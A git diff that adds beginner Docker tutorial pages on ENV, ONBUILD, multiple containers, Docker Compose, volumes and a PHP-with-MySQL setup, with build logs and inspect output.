image 0.0s + => => exporting layers 0.0s + => => writing image sha256:6f9741e9b952495e61c515945c4acd85d85aef1e631b7d37c348c26e9f5d216d 0.0s + => => naming to docker.io/sangam14/env-dockerfile 0.0s + +``` + +### inspect Env Config + +```sh +docker image inspect --format '{{json .Config}}' sangam14/env-dockerfile | jq '.Env' +[ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "appDescription=This app is a sample of using ENV instructions", + "appName=env-demo", + "note1=The First Note First", + "note2=The Second Note Second", + "note3=The Third Note Third", + "changeMe=Old Value" +] + +``` +#### change envirmonment variable + +```sh + +docker run --rm --env changeMe="New Value" --env adhoc="run time" sangam14/env-dockerfile env +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=12804862fac4 +changeMe=New Value +adhoc=run time +appDescription=This app is a sample of using ENV instructions +appName=env-demo +note1=The First Note First +note2=The Second Note Second +note3=The Third Note Third +HOME=/root + +``` \ No newline at end of file diff --git a/content/en/docker/a18.ONBUILD-instruction 2.md b/content/en/docker/a18.ONBUILD-instruction 2.md new file mode 100644 index 0000000..917216f --- /dev/null +++ b/content/en/docker/a18.ONBUILD-instruction 2.md @@ -0,0 +1,95 @@ +--- +title: "Dockerfile Lab - ONBUILD instruction " +slug: "Dockerfile-Lab-ONBUILD-instruction" +--- + +#### The ONBUILD instruction + +The ONBUILD instruction is a trigger. It sets instructions that will be executed when another image is built from the image being build. + +This is useful for building images which will be used as a base to build other images. + +```sh +ONBUILD COPY . /src + +``` + +You can't chain ONBUILD instructions with ONBUILD. +ONBUILD can't be used to trigger FROM instructions. + + +```Dockerfile +FROM nginx:1.16-alpine +WORKDIR /usr/share/nginx/html +ONBUILD COPY index.html . +``` + +#### build dockerfile + +```sh +docker build -t sangam14/onbuild-dockerfile -f dockerfile.onbuild . 
+[+] Building 5.8s (7/7) FINISHED + => [internal] load build definition from dockerfile.onbuild 0.0s + => => transferring dockerfile: 129B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/nginx:1.16-alpine 3.3s + => [auth] library/nginx:pull token for registry-1.docker.io 0.0s + => [1/2] FROM docker.io/library/nginx:1.16-alpine@sha256:5057451e461dda671da5e951019ddbff9d96a751fc7d548053523ca1f848c1ad 2.4s + => => resolve docker.io/library/nginx:1.16-alpine@sha256:5057451e461dda671da5e951019ddbff9d96a751fc7d548053523ca1f848c1ad 0.0s + => => sha256:f07e4bcf42b862c240f4c00f2f7ed362d7d93ca15151de547beda593f3b669e5 2.72MB / 2.72MB 0.8s + => => sha256:078902f02c3a797288251014301298bd748886eaf5fc107e128cc1b4933ec57d 6.25MB / 6.25MB 2.1s + => => sha256:5057451e461dda671da5e951019ddbff9d96a751fc7d548053523ca1f848c1ad 1.41kB / 1.41kB 0.0s + => => sha256:75a7ebf15c39feb30c0444c1ab8d585fe490c35dca30c337e06b73c55fb0e30f 739B / 739B 0.0s + => => sha256:c3144a54094d9628d01573952dfc7b580a76f2a3570f72b8900df676a697c1bb 6.98kB / 6.98kB 0.0s + => => extracting sha256:f07e4bcf42b862c240f4c00f2f7ed362d7d93ca15151de547beda593f3b669e5 0.1s + => => extracting sha256:078902f02c3a797288251014301298bd748886eaf5fc107e128cc1b4933ec57d 0.3s + => [2/2] WORKDIR /usr/share/nginx/html 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:8fc6b719b70ed34467487519cca45523b18eb6f394187d50b08f5157b495efe4 0.0s + => => naming to docker.io/sangam14/onbuild-dockerfile 0.0s + ``` + + +### create another dockerfile + +```Dockerfile +From sangam14/onbuild-dockerfile +COPY index.html . + +``` +#### here you will see default ngnix index page + +```sh + docker run -p 80:80 sangam14/onbuild-dockerfile + + ``` + +#### build docker file + +```sh + +docker build -t sangam14/onbuild1-dockerfile -f dockerfile.onbuild1 . +[+] Building 0.1s (8/8) FINISHED + => [internal] load build definition from dockerfile.onbuild1 0.0s + => => transferring dockerfile: 107B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/sangam14/onbuild-dockerfile:latest 0.0s + => [internal] load build context 0.0s + => => transferring context: 32B 0.0s + => [1/2] FROM docker.io/sangam14/onbuild-dockerfile 0.0s + => [2/2] COPY index.html . 0.0s + => [3/2] COPY index.html . 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:c2291a76ea7cf76b5449ad476d47880b3c5b1bf0119cf7d1fe54111f88db2157 0.0s + => => naming to docker.io/sangam14/onbuild1-dockerfile +``` + +above container copied index.html form local + +```sh +docker run -p 80:80 sangam14/onbuild1-dockerfile +``` \ No newline at end of file diff --git a/content/en/docker/a19.Multiple-Container 2.md b/content/en/docker/a19.Multiple-Container 2.md new file mode 100644 index 0000000..ecd5a4f --- /dev/null +++ b/content/en/docker/a19.Multiple-Container 2.md @@ -0,0 +1,61 @@ +--- +title: "Running multiple docker containers from CLI " +slug: "Running-multiple-docker-containers-from-CLI" +--- + +#### We will create two containers (linux1, linux2) based on the same image (ubuntu) + +```sh +docker run -it -d --rm --name linux1 ubuntu /bin/bash + +``` +additional flags: +`-d`starts the container as β€œdetached”. Use β€œdocker attach” to attach to it later on. +`--rm` cleans up the container after stopping. 
The container will be removed, basically the same as β€œdocker rm container_identifier” after stopping the container. So everything is kept tidy. +`--name` will give the container a dedicated name, which makes it easier to address the container later on. + + +#### Creates container β€œlinux2” + +```sh +docker run -it -d --rm --name linux2 ubuntu /bin/bash +``` +#### Attaches to container linux1 +```sh +> docker attach linux1 +``` +#### Creates a new directory on container linux1 +```sh +> ls +> mkdir mylinux1 +``` +#### Shows that β€œmylinux1” was created + +```sh +> ls + +``` +#### Attaches to container linux2 + +```sh +> docker attach linux2 + +``` + Shows that the directory of linux2 is different than linux1, although they are both from the same image β€œubuntu” + They are separated, they don’t share their file-system +The bash process is isolated in the container + +```sh + +> ls + +``` +```sh +> exit +``` +Shows only one container which is running, the other one got removed +```sh +> docker ps -a + +``` + diff --git a/content/en/docker/a2.hello-world 2.md b/content/en/docker/a2.hello-world 2.md new file mode 100644 index 0000000..b6c8adf --- /dev/null +++ b/content/en/docker/a2.hello-world 2.md @@ -0,0 +1,163 @@ +--- +title: "Docker Hello World Example" +slug: Docker-Hello-World-Example +--- + +#### run your first hello world example + +```sh +docker run hello-world +``` +is a command that runs a simple Docker container to verify that Docker is correctly installed on your system and working as expected. + +When you run this command, Docker will first check if the "hello-world" image is available locally. If the image is not found, Docker will download it from the Docker Hub registry. + +Once the "hello-world" image is available, Docker will create a container from the image and run it. The container will print a message to the console to indicate that everything is working correctly. + +Here's an example of what you might see when you run docker run hello-world: + +```sh +docker run hello-world +Unable to find image 'hello-world:latest' locally +latest: Pulling from library/hello-world +7050e35b49f5: Pull complete +Digest: sha256:6e8b6f026e0b9c419ea0fd02d3905dd0952ad1feea67543f525c73a0a790fefb +Status: Downloaded newer image for hello-world:latest + +Hello from Docker! +This message shows that your installation appears to be working correctly. + +To generate this message, Docker took the following steps: + 1. The Docker client contacted the Docker daemon. + 2. The Docker daemon pulled the "hello-world" image from the Docker Hub. + (arm64v8) + 3. The Docker daemon created a new container from that image which runs the + executable that produces the output you are currently reading. + 4. The Docker daemon streamed that output to the Docker client, which sent it + to your terminal. + +To try something more ambitious, you can run an Ubuntu container with: + $ docker run -it ubuntu bash + +Share images, automate workflows, and more with a free Docker ID: + https://hub.docker.com/ + +For more examples and ideas, visit: + https://docs.docker.com/get-started/ + + +``` +#### check it out list of docker images + +```sh +dockerworkshop git:(main) βœ— docker images +REPOSITORY TAG IMAGE ID CREATED SIZE +hello-world latest 46331d942d63 11 months ago 9.14kB +``` + + +docker inspect is a command used to retrieve detailed information about one or more Docker objects, such as containers, images, networks, volumes, and more. 
The command allows you to inspect the configuration and state of a Docker object, including its metadata, networking information, storage configuration, and more. + +Here's the basic syntax of the docker inspect command: + +```sh +docker inspect [OPTIONS] OBJECT [OBJECT...] + +``` +- OPTIONS: Optional flags that modify the output of the command. +- OBJECT: The name or ID of the Docker object to inspect. + +For example, to inspect a running Docker container named hello-world , you could use the following command: + +```sh +docker inspect hello-world +[ + { + "Id": "sha256:46331d942d6350436f64e614d75725f6de3bb5c63e266e236e04389820a234c4", + "RepoTags": [ + "hello-world:latest" + ], + "RepoDigests": [ + "hello-world@sha256:6e8b6f026e0b9c419ea0fd02d3905dd0952ad1feea67543f525c73a0a790fefb" + ], + "Parent": "", + "Comment": "", + "Created": "2022-03-19T16:12:58.923371954Z", + "Container": "b2af51419cbf516f3c99b877a64906b21afedc175bd3cd082eb5798e2f277bb4", + "ContainerConfig": { + "Hostname": "b2af51419cbf", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Cmd": [ + "/bin/sh", + "-c", + "#(nop) ", + "CMD [\"/hello\"]" + ], + "Image": "sha256:cc0fff24c4ece63ade5d9f549e42c926cf569112c4f5c439a4a57f3f33f5588b", + "Volumes": null, + "WorkingDir": "", + "Entrypoint": null, + "OnBuild": null, + "Labels": {} + }, + "DockerVersion": "20.10.12", + "Author": "", + "Config": { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Cmd": [ + "/hello" + ], + "Image": "sha256:cc0fff24c4ece63ade5d9f549e42c926cf569112c4f5c439a4a57f3f33f5588b", + "Volumes": null, + "WorkingDir": "", + "Entrypoint": null, + "OnBuild": null, + "Labels": null + }, + "Architecture": "arm64", + "Variant": "v8", + "Os": "linux", + "Size": 9136, + "VirtualSize": 9136, + "GraphDriver": { + "Data": { + "MergedDir": "/var/lib/docker/overlay2/851a7de3abc0e1977e00c9bd8976c5fa1b0d954d3dc847ae15b36539f43e90a3/merged", + "UpperDir": "/var/lib/docker/overlay2/851a7de3abc0e1977e00c9bd8976c5fa1b0d954d3dc847ae15b36539f43e90a3/diff", + "WorkDir": "/var/lib/docker/overlay2/851a7de3abc0e1977e00c9bd8976c5fa1b0d954d3dc847ae15b36539f43e90a3/work" + }, + "Name": "overlay2" + }, + "RootFS": { + "Type": "layers", + "Layers": [ + "sha256:efb53921da3394806160641b72a2cbd34ca1a9a8345ac670a85a04ad3d0e3507" + ] + }, + "Metadata": { + "LastTagTime": "0001-01-01T00:00:00Z" + } + } +] + +``` diff --git a/content/en/docker/a20.write-first-Docker_compose 2.md b/content/en/docker/a20.write-first-Docker_compose 2.md new file mode 100644 index 0000000..760a820 --- /dev/null +++ b/content/en/docker/a20.write-first-Docker_compose 2.md @@ -0,0 +1,117 @@ +--- +title: "Write First Docker Compose file " +slug: "Write-First-Docker-Compose-file" +--- + +cat Dockerfile + +```dockerfile +FROM php:7.2-apache +COPY index.php /var/www/html + +``` + +add index.php file + +```php + [internal] booting buildkit 3.8s + => => pulling image moby/buildkit:buildx-stable-1 2.8s + => => creating container buildx_buildkit_great_brahmagupta0 1.1s + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 85B 0.0s + => [internal] load 
.dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/php:7.2-apache 4.3s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => [internal] load build context 0.0s + => => transferring context: 67B 0.0s + => [1/2] FROM docker.io/library/php:7.2-apache@sha256:4dc0f0115acf8c2f0df69295ae822e49f5ad5fe849725847f15aa0e5802b55f8 8.3s + => => resolve docker.io/library/php:7.2-apache@sha256:4dc0f0115acf8c2f0df69295ae822e49f5ad5fe849725847f15aa0e5802b55f8 0.0s + => => sha256:9639d8c8cc76eb6501b4135a054c1a85bd7397db1010d043bcc03d32bf6d79b6 895B / 895B 0.5s + => => sha256:119f7607f913c50661a95311027b7b944c7bf2ee9e7af5361a14b72ce4d36b34 247B / 247B 0.3s + => => sha256:c5ff78edaefc7917757ec4e434738d5561d016bedd20ebdeeee362ec53c8d200 2.27kB / 2.27kB 0.6s + => => sha256:1c04bb0b5fbe7c2927e6282625ccf4c5e0399e9da46f4a84bb8072dc98add6e5 214B / 214B 0.5s + => => sha256:709f68bc1d50527b9d9de50c516cb337468feb59c6135b414dda628d902a1bc8 13.52MB / 13.52MB 3.2s + => => sha256:9e92e56de9f5b0243dc28d80127f51f9f773d64ce4ae1ad58cfff06c2dcd4c29 494B / 494B 0.8s + => => sha256:485201b000c7ca5a73c2f9d047a204442ea5871a8a1405809d623884d83afc05 12.65MB / 12.65MB 0.9s + => => sha256:28135fd83ed1ac66e6f4288fabe4c84616cfe420e8e6808ba92d052771325ab4 517B / 517B 0.5s + => => sha256:5543a36f8eed548f436944bf39a2e918115fc9b30b54416c1081566f25716010 475B / 475B 0.6s + => => sha256:8d436d7bb0262f042a9554b5c54b25bc1d19cabbb9435747672c34d12f8dc1d0 18.58MB / 18.58MB 1.5s + => => sha256:c17a0a78e91d3ac0ec4a0c0566f57580154ead8d8967258efe94989d86cd05bd 269B / 269B 1.4s + => => sha256:30eb7a300f132babe7d5ed65f9e81a1fdd4542ecf70ac29a91bc290484dbc5e5 70.34MB / 70.34MB 3.2s + => => sha256:c9648d7fcbb6d597cf33916d8fcd207fde8ec05d764b4480d4f3e884e142a902 25.86MB / 25.86MB 3.1s + => => sha256:f88cecc04e76783f0006b9fed72be749e834825383e941e16de2565a0e4a8cc3 229B / 229B 0.5s + => => extracting sha256:c9648d7fcbb6d597cf33916d8fcd207fde8ec05d764b4480d4f3e884e142a902 0.6s + => => extracting sha256:f88cecc04e76783f0006b9fed72be749e834825383e941e16de2565a0e4a8cc3 0.0s + => => extracting sha256:30eb7a300f132babe7d5ed65f9e81a1fdd4542ecf70ac29a91bc290484dbc5e5 1.2s + => => extracting sha256:c17a0a78e91d3ac0ec4a0c0566f57580154ead8d8967258efe94989d86cd05bd 0.0s + => => extracting sha256:8d436d7bb0262f042a9554b5c54b25bc1d19cabbb9435747672c34d12f8dc1d0 0.2s + => => extracting sha256:5543a36f8eed548f436944bf39a2e918115fc9b30b54416c1081566f25716010 0.0s + => => extracting sha256:28135fd83ed1ac66e6f4288fabe4c84616cfe420e8e6808ba92d052771325ab4 0.0s + => => extracting sha256:485201b000c7ca5a73c2f9d047a204442ea5871a8a1405809d623884d83afc05 0.1s + => => extracting sha256:9e92e56de9f5b0243dc28d80127f51f9f773d64ce4ae1ad58cfff06c2dcd4c29 0.0s + => => extracting sha256:709f68bc1d50527b9d9de50c516cb337468feb59c6135b414dda628d902a1bc8 0.2s + => => extracting sha256:c5ff78edaefc7917757ec4e434738d5561d016bedd20ebdeeee362ec53c8d200 0.0s + => => extracting sha256:119f7607f913c50661a95311027b7b944c7bf2ee9e7af5361a14b72ce4d36b34 0.0s + => => extracting sha256:1c04bb0b5fbe7c2927e6282625ccf4c5e0399e9da46f4a84bb8072dc98add6e5 0.0s + => => extracting sha256:9639d8c8cc76eb6501b4135a054c1a85bd7397db1010d043bcc03d32bf6d79b6 0.0s + => [2/2] COPY index.php /var/www/html 0.3s + => exporting to docker image format 4.3s + => => exporting layers 0.0s + => => exporting manifest sha256:4389df930ccac33c104717e827e5a6dc3de4ef60632784ca9ea76806b1bf88b7 0.0s + => => exporting config 
sha256:bcbc4a7a409f828a025ca857acb752536f4cece24a93121e6a920e0c4d60050f 0.0s + => => sending tarball 4.2s + => importing to docker 2.7s +[+] Running 2/2 + β Ώ Network 1-dc_default Created 0.1s + β Ώ Container 1-dc-phpapp-1 Created 0.3s +Attaching to 1-dc-phpapp-1 +1-dc-phpapp-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.2. Set the 'ServerName' directive globally to suppress this message +1-dc-phpapp-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.2. Set the 'ServerName' directive globally to suppress this message +1-dc-phpapp-1 | [Fri Mar 03 00:44:20.034230 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/7.2.34 configured -- resuming normal operations +1-dc-phpapp-1 | [Fri Mar 03 00:44:20.034331 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +1-dc-phpapp-1 | 172.18.0.1 - - [03/Mar/2023:00:44:54 +0000] "GET / HTTP/1.1" 200 244 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +1-dc-phpapp-1 | 172.18.0.1 - - [03/Mar/2023:00:44:54 +0000] "GET /favicon.ico HTTP/1.1" 404 489 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +1-dc-phpapp-1 | 172.18.0.1 - - [03/Mar/2023:00:45:02 +0000] "GET / HTTP/1.1" 200 244 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +ΒΈ + + +``` + +#### open browser + +```sh +http://localhost:8080 + +``` \ No newline at end of file diff --git a/content/en/docker/a21.Docker-Compose-volumes 2.md b/content/en/docker/a21.Docker-Compose-volumes 2.md new file mode 100644 index 0000000..419be3d --- /dev/null +++ b/content/en/docker/a21.Docker-Compose-volumes 2.md @@ -0,0 +1,60 @@ +--- +title: "Docker Compose with Volume Mount" +slug: "Docker-Compose-with-Volume-Mount" +--- + +#### Lets build docker compose file + +```yml +version: '3' +services: + phpapp: + image: php:7.2-apache + ports: + - "8080:80" + volumes: + - "./:/var/www/html" +``` + +above when we do docker compose up it will start apache with php 7.2 +it will mount corrent directory to `/var/www/html` +also it mount port 80 of the container to port 8080 on the host + + +#### create index.php with following content + +```php + [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load build definition from Dockerfile.1 0.0s + => => transferring dockerfile: 58B 0.0s + => [internal] load metadata for docker.io/library/php:7.2-apache 4.7s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => CACHED [1/1] FROM docker.io/library/php:7.2-apache@sha256:4dc0f 0.0s + => => resolve docker.io/library/php:7.2-apache@sha256:4dc0f0115acf 0.0s + => exporting to docker image format 1.7s + => => exporting layers 0.0s + => => exporting manifest sha256:0ba34bb4f00dd5ff9830453180af98fe10 0.0s + => => exporting config sha256:a1c8ee68f9b1abcb72605f5bf0eee69dbf23 0.0s + => => sending tarball 1.6s + => importing to docker 0.0s +[+] Running 2/2 + β Ώ Network 3-dc-custom_default Cre... 
0.1s + β Ώ Container my-php-app Created 0.1s +Attaching to my-php-app + + +``` + +#### check it out localhost 80 + + +http://localhost:8080 + + +update your existing Dockerfile with following content + +```dockerfile +FROM php:7.2-apache + +RUN apt-get -y update \ +&& apt-get install -y libicu-dev \ +&& docker-php-ext-configure intl \ +&& docker-php-ext-install intl + +RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli + + +``` + +update existing docker-compose.yml + +```bash +version: '3' +services: + phpapp: + build: + context: ./ + dockerfile: Dockerfile.2 + image: phpapp:123 + ports: + - "8080:80" + volumes: + - "./:/var/www/html" + container_name: my-php-app + +``` + +#### rebuild docker compose + +```sh +3-DC-Custom git:(main) βœ— docker compose up --build +[+] Building 43.1s (9/9) FINISHED + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load build definition from Dockerfile.2 0.0s + => => transferring dockerfile: 255B 0.0s + => [internal] load metadata for docker.io/library/php:7.2-apache 2.3s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => CACHED [1/3] FROM docker.io/library/php:7.2-apache@sha256:4dc0f 0.0s + => => resolve docker.io/library/php:7.2-apache@sha256:4dc0f0115acf 0.0s + => [2/3] RUN apt-get -y update && apt-get install -y libicu-dev & 28.9s + => [3/3] RUN docker-php-ext-install mysqli && docker-php-ext-enabl 6.9s + => exporting to docker image format 4.9s + => => exporting layers 2.3s + => => exporting manifest sha256:ee6a98e1847d8149754239ab5be0cad310 0.0s + => => exporting config sha256:2800277bcab2cb605936b4f874bff2c8251d 0.0s + => => sending tarball 2.6s + => importing to docker 0.5s +[+] Running 1/1 + β Ώ Container my-php-app Recreated 0.1s +Attaching to my-php-app +my-php-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.22.0.2. Set the 'ServerName' directive globally to suppress this message +my-php-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.22.0.2. Set the 'ServerName' directive globally to suppress this message +my-php-app | [Fri Mar 03 11:55:09.580207 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/7.2.34 configured -- resuming normal operations +my-php-app | [Fri Mar 03 11:55:09.580274 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +my-php-app | 172.22.0.1 - - [03/Mar/2023:11:55:14 +0000] "GET /mysql HTTP/1.1" 404 490 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +my-php-app | 172.22.0.1 - - [03/Mar/2023:11:55:19 +0000] "GET / HTTP/1.1" 200 23831 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +ΒΈ^CGracefully stopping... (press Ctrl+C again to force) +Aborting on container exit... 
+[+] Running 1/1 + β Ώ Container my-php-app Stopped 1.2s +canceled + + +``` \ No newline at end of file diff --git a/content/en/docker/a23.php-database-docker-compose 2.md b/content/en/docker/a23.php-database-docker-compose 2.md new file mode 100644 index 0000000..47c3a5d --- /dev/null +++ b/content/en/docker/a23.php-database-docker-compose 2.md @@ -0,0 +1,219 @@ +--- +title: "Simple php apache and database using docker compose" +slug: "Simple-php-apache-and-database-using-docker-compose" +--- + +we will see detach form logs upon start and user multiservices in one docker container + +```yml +version: '3' + +services: + phpapp: + build: + context: ./ + dockerfile: Dockerfile + image: phpapp:123 + ports: + - "8080:80" + volumes: + - "./:/var/www/html" + container_name: myphpapp-app + + db: + image: mysql:5.7 + restart: always + environment: + MYSQL_ROOT_PASSWORD: my!!!root!!!pw + container_name: myphpapp-db +``` + +here you see two services `phpapp` and `myphpapp-app` and image called phpapp with 123 tag + +another service called db form mysql this container restarts always which means it crashes ? the it +restarts automatically ! + +upon start we set a password for the root user "my!!root!!pw" just fo demostrate + +create dockerfile with following content + +```dockerfile + +FROM php:7.2-apache + +RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli +``` + +crete index.php with following content + +```php +connect_errno > 0) { + echo $db->connect_error; +} else { + echo "DB Connection successful\n\n"; +} + +``` + +#### build docker compose + +```sh + docker-compose up --build +[+] Building 22.7s (7/7) FINISHED + => [internal] load build definition from dockerfile 0.0s + => => transferring dockerfile: 126B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/php:apache-buster 2.6s + => [1/2] FROM docker.io/library/php:apache-buster@sha256:386b6018bd 8.1s + => => resolve docker.io/library/php:apache-buster@sha256:386b6018bd 0.0s + => => sha256:4ba26e0fdc7f78867d9be8a223260f2d592c7be7bd 893B / 893B 0.6s + => => sha256:224f38e513c9d90e092a021139f4859652f2981083 246B / 246B 0.5s + => => sha256:652ab663764a1e05149b0df37b8389096be761 2.46kB / 2.46kB 0.5s + => => sha256:fd3bc60f67a0da00904c6206528bdfa08ff9 11.36MB / 11.36MB 3.0s + => => sha256:a30f4659f909420c63fc05831b6b4847a9cbd15932 491B / 491B 0.6s + => => sha256:5387bfe59045447db1c94ed8d5fc84eb3803 12.38MB / 12.38MB 1.9s + => => sha256:02fed234e9e5648116b0206ab71f67d6de466202ca 513B / 513B 0.5s + => => sha256:0e3638958ff4f83d56ad9a11fc474f5af5e9336f3d 474B / 474B 1.4s + => => sha256:38ce3c4babbe62c529e9a7e6e4de5ac72168 18.58MB / 18.58MB 2.0s + => => sha256:573449e685b037ec25e2637d4fe3e19e09429f5521 269B / 269B 0.6s + => => sha256:de58dc66c01f3c4357b62fc24dc75f3b14a3 70.37MB / 70.37MB 3.8s + => => sha256:ed22f951ea44cd39f81544a2f0bf196ad60d 25.92MB / 25.92MB 1.9s + => => sha256:f0071d92462e7f83ca38e778e6dff5c113712119e2 226B / 226B 0.6s + => => extracting sha256:ed22f951ea44cd39f81544a2f0bf196ad60d13c1428 0.6s + => => extracting sha256:f0071d92462e7f83ca38e778e6dff5c113712119e27 0.0s + => => extracting sha256:de58dc66c01f3c4357b62fc24dc75f3b14a32bf650f 1.2s + => => extracting sha256:573449e685b037ec25e2637d4fe3e19e09429f55213 0.0s + => => extracting sha256:38ce3c4babbe62c529e9a7e6e4de5ac72168768d161 0.3s + => => extracting sha256:0e3638958ff4f83d56ad9a11fc474f5af5e9336f3d2 0.0s + => => extracting sha256:02fed234e9e5648116b0206ab71f67d6de466202ca2 
0.0s + => => extracting sha256:5387bfe59045447db1c94ed8d5fc84eb3803be624d8 0.1s + => => extracting sha256:a30f4659f909420c63fc05831b6b4847a9cbd159320 0.0s + => => extracting sha256:fd3bc60f67a0da00904c6206528bdfa08ff9515ce14 0.2s + => => extracting sha256:652ab663764a1e05149b0df37b8389096be76171a21 0.0s + => => extracting sha256:224f38e513c9d90e092a021139f4859652f2981083e 0.0s + => => extracting sha256:4ba26e0fdc7f78867d9be8a223260f2d592c7be7bdb 0.0s + => [2/2] RUN docker-php-ext-install mysqli && docker-php-ext-enable 7.8s + => exporting to docker image format 4.2s + => => exporting layers 0.0s + => => exporting manifest sha256:a328dcabf983b4d59f41482a80e08861ee4 0.0s + => => exporting config sha256:b38bdd1cd3eabf8ea442587b892d0a0d86e6d 0.0s + => => sending tarball 4.1s + => importing to docker 2.5s +[+] Running 2/2 + β Ώ Container myphpapp-db Created 0.0s + β Ώ Container myphpapp-app Recreated 0.3s +Attaching to myphpapp-app, myphpapp-db +myphpapp-db | 2023-03-03 19:30:17+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | [Fri Mar 03 19:30:17.681041 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/8.2.3 configured -- resuming normal operations +myphpapp-app | [Fri Mar 03 19:30:17.681312 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +myphpapp-db | 2023-03-03 19:30:17+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql' +myphpapp-db | 2023-03-03 19:30:17+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-db | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock' +myphpapp-db | 2023-03-03T19:30:18.754320Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead. +myphpapp-db | 2023-03-03T19:30:18.756720Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1 +myphpapp-db | 2023-03-03T19:30:18.764513Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started. +myphpapp-db | 2023-03-03T19:30:19.043718Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended. +myphpapp-db | 2023-03-03T19:30:19.237016Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed. +myphpapp-db | 2023-03-03T19:30:19.237069Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel. +myphpapp-db | 2023-03-03T19:30:19.238922Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory. +myphpapp-db | 2023-03-03T19:30:19.258982Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL. +myphpapp-db | 2023-03-03T19:30:19.259341Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. 
Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock +myphpapp-app | 172.24.0.1 - - [03/Mar/2023:19:30:35 +0000] "GET / HTTP/1.1" 200 235 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" + +``` + +### open browser + +http://localhost:8080 + +if you see out put as DB Connection successful + +cheers ! + + +lets adda a query to select the existing database on the mariaDB server extend your index.php + +```php +connect_errno > 0) { + echo $db->connect_error; +} else { + echo "DB Connection successful\n\n"; + + //we read out the content + $result=mysqli_query($conn,"SHOW DATABASES;"); + while( $row = mysqli_fetch_row( $result ) ){ + echo $row[0]."\n"; + } +} + +``` + +rebuild your docker compose after updating your php file + + +```sh +4-DC-apache-database git:(main) βœ— docker-compose up --build +[+] Building 4.0s (8/8) FINISHED + => [internal] load build definition from dockerfile 0.0s + => => transferring dockerfile: 126B 